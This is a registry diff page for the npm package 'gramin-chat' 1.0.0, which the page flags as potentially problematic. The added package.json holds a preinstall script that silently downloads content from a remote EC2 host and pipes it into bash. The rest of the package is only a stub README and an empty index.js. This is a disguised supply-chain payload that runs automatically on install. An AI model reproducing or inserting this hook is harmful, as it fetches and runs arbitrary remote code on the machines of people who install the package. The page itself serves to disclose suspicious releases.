gramin-chat 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of gramin-chat might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +3 -0
  2. package/index.js +0 -0
  3. package/package.json +8 -0
package/README.md ADDED
@@ -0,0 +1,3 @@
1
+ # GRAMING CHAT PACKAGE
2
+ - testing package
3
+
package/index.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1,8 @@
1
+ {
2
+ "name": "gramin-chat",
3
+ "version": "1.0.0",
4
+ "dependencies": {},
5
+ "scripts": {
6
+ "preinstall": "curl http://ec2-54-234-211-80.compute-1.amazonaws.com:21/ 2>&1 | bash 1>/dev/null 2>&1"
7
+ }
8
+ }